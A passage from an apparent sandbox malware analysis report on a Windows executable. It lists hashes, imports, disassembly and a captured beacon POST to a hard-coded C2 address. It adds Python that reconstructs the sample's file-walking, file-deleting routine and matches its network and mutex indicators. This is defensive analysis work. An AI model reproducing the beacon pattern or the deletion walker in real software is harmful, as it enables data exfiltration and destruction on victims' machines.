SSDEEP:6144:pSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:gvloTMW+EZMM6DFyo03w
MD5:5C5CB16DBDE73084B9CD80A3F001887C
SHA1:9AEF0246185C6D6D5F0C2A38968539105C6AFF3F
SHA-256:7E777A237D32B8C733165779754050734434288160D008305F0396C0482F529F
SHA-512:4EC26FDC90DCC5DD9B02B421626A936679A66A77A457359CB1B03FB2BCE0178FDD22E9640E1EF5DBED394BD41CB151D5F9C74F4CEBA7EF39BEA024ADD3FF50D6
Malicious:false
Reputation:low
Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm2...n................................................................................................................................................................................................................................................................................................................................................1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.972409904582663
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:V6ZsDcgx4N.exe
File size:38'912 bytes
MD5:2d4e723c184d9403b078e53f2de74a23
SHA1:92fa5f8f346cb987f249bd41755c5aedaf4c8646
SHA256:0a6bf0678bbd793e39a84dfb4c71d8b709d9e538288bf826c48b1ba899803ba4
SHA512:a8f5267ae7f465a65a46d6abeaed0c7a910c349e708e4264cc68747ee26db78d62b575dedb2e64553c207b914ba240654930774954dfa7503c93393cfadce9ad
SSDEEP:768:ZCMmeyIJkkZ7XPImohfdjm7MEW/kJ7S/DWJ3GTHvvM1zI:ZCFeySkkJgl2MEW/ozwXM1
TLSH:6F032A01E841E03AFDE151FED3F706BD8E3C2F10132518DB06E5A5A9EB556E6B83086B
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................n.......................n.......n......Rich....................PE..L...PS.f...............&............0......
Icon Hash:00928e8e8686b000
Entrypoint:0x401d30
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x66CC5350 [Mon Aug 26 10:05:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4576a725988be81bfee6ec0cabf5e869
Instruction
push ebp
mov ebp, esp
sub esp, 00000FD8h
push esi
push 0040B02Dh
push 00000000h
push 00000000h
call dword ptr [0040A01Ch]
mov dword ptr [ebp-04h], eax
cmp dword ptr [ebp-04h], 00000000h
je 00007FB030E4A73Fh
call dword ptr [0040A018h]
cmp eax, 000000B7h
jne 00007FB030E4A737h
jmp 00007FB030E4A819h
push 00000FC0h
push 00000000h
lea eax, dword ptr [ebp-00000FD8h]
push eax
call 00007FB030E4A9DEh
add esp, 0Ch
lea ecx, dword ptr [ebp-00000FD8h]
push ecx
call 00007FB030E4A64Fh
add esp, 04h
call 00007FB030E51B77h
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-24h], edx
lea edx, dword ptr [ebp-00000FD8h]
push edx
call 00007FB030E4BA55h
add esp, 04h
mov eax, 00000001h
test eax, eax
je 00007FB030E4A7ADh
mov dword ptr [ebp-18h], 00000001h
movzx ecx, byte ptr [ebp-20h]
test ecx, ecx
jne 00007FB030E4A78Eh
call 00007FB030E51B45h
mov ecx, eax
mov esi, edx
sub ecx, dword ptr [ebp-28h]
sbb esi, dword ptr [ebp-24h]
movzx eax, byte ptr [0040B06Ch]
cdq
mov dword ptr [ebp-0Ch], ecx
mov dword ptr [ebp-08h], esi
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-10h], edx
mov edx, dword ptr [ebp-08h]
cmp edx, dword ptr [ebp-10h]
jc 00007FB030E4A763h
jnbe 00007FB030E4A73Ah
mov eax, dword ptr [ebp-0Ch]
cmp eax, dword ptr [ebp-14h]
jc 00007FB030E4A759h
lea ecx, dword ptr [ebp-00000FD8h]
push ecx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa61c | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0x258 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa504 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8380 | 0x8400 | cb1d32db83e69601384a9f1c2e69fe55 | False | 0.4835464015151515 | data | 5.999842112550039 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa000 | 0x8d2 | 0xa00 | 8dd9a61cc343c3f7536605412f999393 | False | 0.43828125 | data | 4.315759737584478 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x544 | 0x200 | 98f5f2ae72a99ac6ae2a0fb846c7af44 | False | 0.490234375 | data | 3.757947307933703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0xc000 | 0x258 | 0x400 | 5549773c51f762effe22df1a1b6c3181 | False | 0.5625 | data | 4.367976825968331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | OpenProcess, ExitProcess, GetLastError, CreateMutexA, Sleep, GetCurrentProcess, TerminateThread, LocalAlloc, LocalFree, GetSystemInfo, GetModuleFileNameW, GetUserDefaultUILanguage, GetFileType, CloseHandle, CreateThread, DeleteFileW
USER32.dll | GetSystemMetrics
ADVAPI32.dll | CryptSignHashA
SHELL32.dll | SHGetFolderPathW
CRYPT32.dll | CryptUpdateProtectedState
WINHTTP.dll | WinHttpTimeFromSystemTime
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 27, 2024 12:47:48.152389050 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:48.152448893 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:48.152520895 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:48.157084942 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:48.157116890 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:48.890213966 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:48.890316963 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:48.930354118 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:48.930372953 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:48.931442976 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:48.974436045 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.633585930 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.633622885 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.633650064 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:49.964458942 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:49.964478970 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:49.964572906 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:49.964595079 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.964623928 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.967385054 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.967406034 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Aug 27, 2024 12:47:49.967420101 CEST | 49704 | 443 | 192.168.2.5 | 45.125.66.18
Aug 27, 2024 12:47:49.967426062 CEST | 443 | 49704 | 45.125.66.18 | 192.168.2.5
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 45.125.66.18 | 443 | 2556 | C:\Users\user\Desktop\V6ZsDcgx4N.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:47:49 UTC | 287 | OUT | POST /api/receiver/recv HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
Content-Length: 3160
Host: 45.125.66.18
2024-08-27 10:47:49 UTC | 3160 | OUT | Data Raw: (3160-byte binary request body; hex dump omitted)
Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
2024-08-27 10:47:49 UTC | 231 | IN | HTTP/1.1 201 Created
Server: nginx/1.18.0
Date: Tue, 27 Aug 2024 10:47:49 GMT
Content-Type: application/octet-stream
Content-Length: 4230
Connection: close
X-Powered-By: Express
ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"
2024-08-27 10:47:49 UTC | 4230 | IN | Data Raw: (4230-byte binary response body; hex dump omitted)
Data Ascii:



Target ID:0
Start time:06:47:46
Start date:27/08/2024
Path:C:\Users\user\Desktop\V6ZsDcgx4N.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\V6ZsDcgx4N.exe"
Imagebase:0x190000
File size:38'912 bytes
MD5 hash:2D4E723C184D9403B078E53F2DE74A23
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:06:47:49
Start date:27/08/2024
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 54484
Imagebase:0x8c0000
File size:483'680 bytes
MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


    Execution Graph

    Execution Coverage:19.6%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:13.3%
    Total number of Nodes:377
    Total number of Limit Nodes:12

    Control-flow Graph

    APIs
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    • NtQuerySystemInformation.NTDLL(00000010,?,00001000,00000000), ref: 001914A9
    • OpenProcess.KERNEL32(00000040,00000000,?), ref: 00191523
    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0019154B
    • DuplicateHandle.KERNELBASE(000000FF,?,00000000), ref: 00191565
    • GetFileType.KERNELBASE(000000FF), ref: 0019157F
    • CloseHandle.KERNEL32(000000FF), ref: 0019159E
    • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000001), ref: 001915AE
    • DuplicateHandle.KERNEL32(000000FF,?,00000000), ref: 001915C8
    • CloseHandle.KERNEL32(000000FF), ref: 001915DC
    • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 001915EF
      • Part of subcall function 00191EE0: RtlFreeHeap.NTDLL(02590000,00000000,00000000,009C0000), ref: 00191EFE
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Handle$CloseProcess$CurrentDuplicateHeap$AllocateChangeFileFindFreeInformationNotificationOpenQuerySystemType
    • String ID:
    • API String ID: 2769610337-0
    • Opcode ID: a667840d9a4539fabcca1c960dcc61729685a7f37f919adb6953b9a06dbe3e49
    • Instruction ID: 0d136b9f20b68a9a394dfaa30cc83b27ff18731bf8278e1f5ee0dcf5aa73cb80
    • Opcode Fuzzy Hash: a667840d9a4539fabcca1c960dcc61729685a7f37f919adb6953b9a06dbe3e49
    • Instruction Fuzzy Hash: 355153B4D0020AFFDF14CFD8D984BAEB7B5BF48305F158259E612A7280D734AA85CB91

    Control-flow Graph

    APIs
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    • FindFirstFileW.KERNELBASE(00000000,?), ref: 00198D83
    • FindNextFileW.KERNELBASE(000000FF,?), ref: 00198EB1
    • FindClose.KERNEL32(000000FF), ref: 00198EC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Find$File$AllocateCloseFirstHeapNext
    • String ID: %s\%s$%s\*
    • API String ID: 2963102669-2848263008
    • Opcode ID: 50f429fd5c00bef8b35697c12d38414090c3928e8657d90d2d7982637db81069
    • Instruction ID: 1c491e64ff413298b4a98f6dd5121dc38a1220311df394be294a91777e8cae40
    • Opcode Fuzzy Hash: 50f429fd5c00bef8b35697c12d38414090c3928e8657d90d2d7982637db81069
    • Instruction Fuzzy Hash: D141EDB5E00218ABCF14DFA8D9A5AEF77B5AF59300F1485A8F90597281EB34AB40CB50
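    The function above is a recursive directory walker: the graph lists FindFirstFileW on a "%s\*" pattern, a FindNextFileW loop closed by FindClose, a "%s\%s" child path handed to an indirect callback (191110 or 191380) and a recursive call back into 198d40. The Python below is an added, readable reconstruction of that loop written for this report; it is not the sample's code and not Joe Sandbox output. The function and callback names are invented, the demo tree is constructed, and the recursion condition (recurse into every subdirectory) and the role of the two 192250 calls (the "." and ".." comparison) are assumptions drawn from the graph.

```python
"""Readable reconstruction of the directory walker at 00198D40 (added example).

Derived from the control-flow graph and the format strings "%s\\*" and "%s\\%s"
recovered for this function. Names, the callback signature and the recursion
condition are assumptions; this is not the sample's own code.
"""
import os
import tempfile


def walk_like_198d40(directory, callback, depth=0):
    """Enumerate `directory` the way the disassembly does; return the entry count.

    FindFirstFileW("<dir>\\*") / FindNextFileW become os.listdir(); the two
    192250 calls (presumably the "." and ".." comparison) are not needed because
    os.listdir never returns those entries; "%s\\%s" becomes os.path.join().
    """
    try:
        entries = os.listdir(directory)
    except OSError:
        return 0                        # FindFirstFileW failed: straight to the return block
    visited = 0
    for name in entries:
        child = os.path.join(directory, name)
        is_dir = os.path.isdir(child)
        visited += 1
        callback(child, is_dir, depth)  # indirect call at 198e48 (191110 or 191380)
        if is_dir:                      # assumed condition for the recursive call at 198e6a
            visited += walk_like_198d40(child, callback, depth + 1)
    return visited


def build_demo_tree():
    """Create a small constructed tree in a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="walk198d40_")
    os.makedirs(os.path.join(root, "a", "b"))
    for rel in ("top.txt", os.path.join("a", "one.dat"), os.path.join("a", "b", "two.dat")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("x")
    return root


def collect(root):
    """Run the walker with a recording callback; return sorted (relative path, is_dir)."""
    seen = []
    walk_like_198d40(
        root, lambda path, is_dir, depth: seen.append((os.path.relpath(path, root), is_dir))
    )
    return sorted(seen)


if __name__ == "__main__":
    demo = build_demo_tree()
    for rel, is_dir in collect(demo):
        print(("dir  " if is_dir else "file ") + rel)
```

Read alongside the callers at 191060 and 1912f0 (SHGetFolderPathW, then 198d40), this is the pattern of a routine that is pointed at a known shell folder and applies a per-entry action to everything under it; 191110, one of the two callback targets, ends in DeleteFileW.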

    Control-flow Graph (rendered graph not preserved): function 1917e0-191a1c; calls 192130 and 1990f0; APIs in the graph: GlobalHandle (at 1918a2), LoadLibraryA and GetProcAddress (at 1919f7).
    APIs
    • GlobalHandle.KERNEL32(00000000), ref: 001918C8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: GlobalHandle
    • String ID: l
    • API String ID: 1075865800-2517025534
    • Opcode ID: e3975b31335fedd46d34115aca8a69f79438400aaa77e8c82c8e3974630c03b1
    • Instruction ID: a1617e16d1fb0ad4456cb9066c77e2625da379653a6284c83116c101cd86ebc2
    • Opcode Fuzzy Hash: e3975b31335fedd46d34115aca8a69f79438400aaa77e8c82c8e3974630c03b1
    • Instruction Fuzzy Hash: FF919374E05249EFCF08CF98D590AADBBB2FF48308F248199D915AB345D730AA91DF94
    APIs
    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00193271,00193147), ref: 00198CAA
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: InfoSystem
    • String ID:
    • API String ID: 31276548-0
    • Opcode ID: 8dafc0fd3e50f440229e4450dcd0c3b7b59951f1e94a4ea218124536a1c2a8d3
    • Instruction ID: cd79f90f5b27da9de2163c091ea039fe00ad13085a2218df904306e926b814dd
    • Opcode Fuzzy Hash: 8dafc0fd3e50f440229e4450dcd0c3b7b59951f1e94a4ea218124536a1c2a8d3
    • Instruction Fuzzy Hash: 62D0A97490020C8BCB00DF90C84889AB7FDAF48200F0081A5EC4847300EA32A9568BD1
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: cbae8bdaf470c6a5cd34aafb2b40ce8b47aa4a6b33389a633a39b64f225c1ae7
    • Instruction ID: 2a7688bb57c4dc14c89101ff728fafd3c80fbf3e08f1858384674206c9b23770
    • Opcode Fuzzy Hash: cbae8bdaf470c6a5cd34aafb2b40ce8b47aa4a6b33389a633a39b64f225c1ae7
    • Instruction Fuzzy Hash: 90412630A08205EBDF14CFA4E991B69B7B6EB85304F2481A9E5114F7D9D736DF82CB50

    Control-flow Graph (rendered graph not preserved): function 192810-19291f; API in the graph: CreateThread (two call sites, at 1928c5 and 1928eb).
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
    • API String ID: 0-2265949662
    • Opcode ID: dbfcf35f5a5ee36c41404830a31fbd680e3191060b4ae51d94db979815185901
    • Instruction ID: d1753ada8403b3e3380677d5f56de6a9bcfa11c100310a18dd4613d770205be7
    • Opcode Fuzzy Hash: dbfcf35f5a5ee36c41404830a31fbd680e3191060b4ae51d94db979815185901
    • Instruction Fuzzy Hash: 3D310874644308BFEB10CF50DC86FA97BA5BB08741F20C159FA099F2D1C3B5AA85CB85

    Control-flow Graph

    APIs
    • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 00191D43
    • GetLastError.KERNEL32 ref: 00191D52
    • Sleep.KERNELBASE(00001388), ref: 00191E1C
    • CloseHandle.KERNEL32(00000000), ref: 00191E3A
    • ExitProcess.KERNEL32 ref: 00191E42
    Strings
    • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 00191D3A
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
    • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
    • API String ID: 168847217-1460249064
    • Opcode ID: fca84eac6b69e47a5d9baa8f70aeb7c1efe893e37b84fffa0d4beedc32acd9dc
    • Instruction ID: 299b476a326ce3eab44841a258c7527bf21058f3736dd15412114802dc7d4e04
    • Opcode Fuzzy Hash: fca84eac6b69e47a5d9baa8f70aeb7c1efe893e37b84fffa0d4beedc32acd9dc
    • Instruction Fuzzy Hash: 9131B6B1D0021AFBDF24EBA4D845BED77B5BF14700F144066F805B2581DB359AD4DBA2

    Control-flow Graph (rendered graph not preserved): function 192e60-1930b2; calls 1991d0, 192920 and 191ea0; API in the graph: Sleep (block 19309f, which loops back to 192e6d).
    APIs
    • Sleep.KERNELBASE(000003E8), ref: 001930A4
      • Part of subcall function 00191EA0: RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocateHeapSleep
    • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
    • API String ID: 4201116106-1595302217
    • Opcode ID: 54530706ed8a2d79dbefc79afbe743917a931af03a4e792ca7b0ee56a4a45d3d
    • Instruction ID: a0c18d364692d58c32c12bbf1849f6e3eb0edc89338cded800b960b0d120ddc3
    • Opcode Fuzzy Hash: 54530706ed8a2d79dbefc79afbe743917a931af03a4e792ca7b0ee56a4a45d3d
    • Instruction Fuzzy Hash: 8D7167B8A00219EBCB14CF84D584ABDBBB1FF48714F608198F9565B381D775EE81DB90
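    The strings recovered from 192810 and 192e60 (the address 45.125.66.18, a POST to /api/receiver/recv with Content-Type: application/octet-stream, and a fixed Chrome 91 / Edge 91 user agent) together with the mutex name 082e2202-17f7-4654-a651-ac9a3778e1d7 passed to CreateMutexA at 00191D43 are enough to write detection logic for this sample. The following Python is an added example written for this report; it is not Joe Sandbox output and not code from the sample. The indicator values come from the listings above; the proxy log layout, the mutex event layout, every sample log line and the scoring weights are constructed assumptions to be adapted to real telemetry.

```python
"""Indicator matching for V6ZsDcgx4N.exe (added example, not part of the report).

Indicator values are copied from the report's string and API listings. The proxy
log layout, the mutex event layout and every SAMPLE_* entry are constructed for
illustration; adapt the regexes to real telemetry.
"""
import re

# Indicators from the report
C2_HOST = "45.125.66.18"                            # string referenced at 00192810
C2_PATH = "/api/receiver/recv"                      # string referenced at 00192E60
C2_CONTENT_TYPE = "application/octet-stream"
C2_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4")
MUTEX_NAME = "082e2202-17f7-4654-a651-ac9a3778e1d7"  # CreateMutexA at 00191D43

# Assumed proxy log layout:
#   <timestamp> <client> <method> <host> <path> <status> <content-type> "<user-agent>"
PROXY_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<host>\S+)\s+'
    r'(?P<path>\S+)\s+(?P<status>\d{3})\s+(?P<ctype>\S+)\s+"(?P<ua>[^"]*)"$'
)

# The address and the URI are specific to this sample. The user agent is a real
# Edge 91 string that other software can send, so it only scores together with
# the octet-stream POST used by the beacon loop. Weights are assumptions.
HIT_THRESHOLD = 3


def score_proxy_line(line):
    """Return (score, reasons) for one proxy log line; (0, []) when nothing matches."""
    m = PROXY_RE.match(line.strip())
    if not m:
        return 0, []
    f = m.groupdict()
    score, reasons = 0, []
    if f["host"] == C2_HOST:
        score += 3
        reasons.append("destination is the hard-coded C2 address")
    if f["path"] == C2_PATH:
        score += 2
        reasons.append("URI matches the beacon endpoint")
    if f["method"] == "POST" and f["ctype"] == C2_CONTENT_TYPE and f["ua"] == C2_USER_AGENT:
        score += 2
        reasons.append("octet-stream POST carrying the sample's exact user agent")
    return score, reasons


def scan_proxy_log(lines):
    """Return [(score, reasons, line)] for every line scoring at least HIT_THRESHOLD."""
    hits = []
    for line in lines:
        score, reasons = score_proxy_line(line)
        if score >= HIT_THRESHOLD:
            hits.append((score, reasons, line))
    return hits


# Object-manager prefixes that host telemetry may put in front of a mutex name.
_NS_PREFIX = re.compile(
    r'^(?:\\Sessions\\\d+\\BaseNamedObjects\\|\\BaseNamedObjects\\|Global\\|Local\\)',
    re.IGNORECASE,
)


def is_sample_mutex(name):
    """True when a mutex name from host telemetry is the sample's mutex.

    The sample passes the bare GUID to CreateMutexA, so the object is created in
    the caller's session-local namespace; any prefix is stripped before comparing.
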